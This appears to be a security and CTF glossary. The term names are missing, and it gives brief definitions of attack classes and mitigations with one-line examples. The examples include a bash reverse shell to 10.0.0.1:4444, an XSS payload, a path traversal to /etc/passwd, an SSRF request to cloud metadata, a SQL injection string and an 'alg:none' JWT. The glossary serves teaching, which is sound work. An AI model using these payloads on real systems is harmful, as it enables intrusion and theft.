Security & CTF Glossary

A mitigation that randomizes the base addresses of the stack, heap, and libraries each run, forcing attackers to leak an address before they can reuse one.

Writing past the bounds of a fixed-size buffer to overwrite adjacent memory — classically the saved return address, hijacking control flow.

char buf[64]; gets(buf);

A security competition where players solve challenges to recover hidden 'flag' strings. Formats include Jeopardy (categorized tasks) and Attack-Defense.

flag{y0u_f0und_m3}

Public, append-only logs of every issued TLS certificate. Querying them reveals hostnames — including internal and staging environments — an org never published.

crt.sh?q=%25.example.com

A standardized public identifier for a specific known vulnerability, letting researchers, vendors, and defenders reference the same flaw unambiguously.

CVE-2021-44228

Tricking an authenticated user's browser into submitting an unwanted state-changing request, abusing the automatic inclusion of session cookies.

Getting a victim's browser to execute attacker-supplied JavaScript in the context of a trusted site. Comes in reflected, stored, and DOM-based flavors.

<img src=x onerror=alert(document.domain)>

A block-cipher mode that encrypts each block independently, so identical plaintext blocks produce identical ciphertext — leaking structure and enabling cut-and-paste attacks.

Recovering files from raw bytes using signatures (magic bytes) and structure alone, without relying on filesystem metadata — essential after deletion or corruption.

FF D8 FF E0  ⟶  start of JPEG

Passing attacker input as the format argument to printf-family functions, yielding arbitrary memory reads via %x/%s and arbitrary writes via %n.

printf(user_input);  // bug

Using advanced search operators to surface exposed files, login portals, and misconfigurations that search engines have already indexed.

site:example.com filetype:env

Against Merkle–Damgård hashes (MD5, SHA-1, SHA-256), an attacker who knows H(secret‖msg) and the length can compute H(secret‖msg‖pad‖extra) without the secret.

Accessing resources you shouldn't by tampering with an identifier the server fails to authorize — e.g. changing /invoice/1001 to /invoice/1002.

GET /api/users/1337/settings

A signed, base64url-encoded token used for stateless auth. Common bugs include the `alg:none` downgrade, weak HMAC secrets, and confused signature verification.

eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.

Abusing a file-loading parameter to read arbitrary local files (LFI) or load a remote payload (RFI), frequently escalating to code execution.

page=../../../../etc/passwd

Analyzing a RAM capture to recover running processes, open sockets, injected code, and decrypted keys — artifacts that never persist to disk.

Hidden descriptive fields embedded in files — EXIF GPS in photos, author and revision history in documents — that frequently leak more than the visible content.

exiftool suspicious.jpg

Using the same number-used-once with a stream cipher or AEAD mode. It XORs two plaintexts together (CTR) or breaks authentication entirely (GCM).

C1 XOR C2 = P1 XOR P2

Gathering intelligence from publicly available sources — social media, public records, leaked databases, and search engines — with zero contact with the target.

A recorded stream of network traffic. Reassembling TCP flows recovers transferred files, credentials, and command-and-control conversations.

A server that reveals whether decryption padding was valid, leaking enough information to decrypt or forge CBC ciphertext one byte at a time without the key.

Probing a host to learn which TCP/UDP ports are open and what services answer, building the service map that drives every later exploitation step.

nmap -sV -p- target

Moving from limited access to higher privileges — exploiting misconfigured SUID binaries, sudo rules, kernel bugs, or weak file permissions.

sudo -l

Chaining short instruction sequences ('gadgets') that end in `ret` to perform arbitrary computation using only code already present in the binary — defeating NX.

A shell where the compromised host connects back to the attacker's listener, sidestepping inbound firewall rules that would block a bind shell.

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

Public-key cryptosystem whose security rests on factoring a large modulus. Attacks target small exponents, shared primes, and poor padding rather than the math itself.

c = m^e mod n

Coercing a server into making HTTP requests on your behalf — often to internal services, cloud metadata endpoints, or otherwise unreachable hosts.

url=http://169.254.169.254/latest/meta-data/

Inserting attacker-controlled SQL into a query the application sends to its database, letting you read, modify, or exfiltrate data the app never meant to expose.

username=admin'-- 

A secret value placed before the saved return address and checked on function exit. A linear overflow must overwrite it, so a mismatch aborts the program.

Hiding data inside other data — least-significant-bit pixel tweaks, audio spectrograms, or trailing bytes — so the carrier looks ordinary to the eye.

Discovering an organization's hostnames through brute force, certificate transparency, and DNS records to expand the attack surface beyond the obvious site.

subfinder -d example.com

Using a pointer to heap memory after it has been freed. Reclaiming that chunk with controlled data turns a dangling pointer into a powerful primitive.

Combining data with a key via bitwise XOR. Trivially broken when the key is short and reused; frequency analysis and crib-dragging recover the keystream.

ciphertext ^ key = plaintext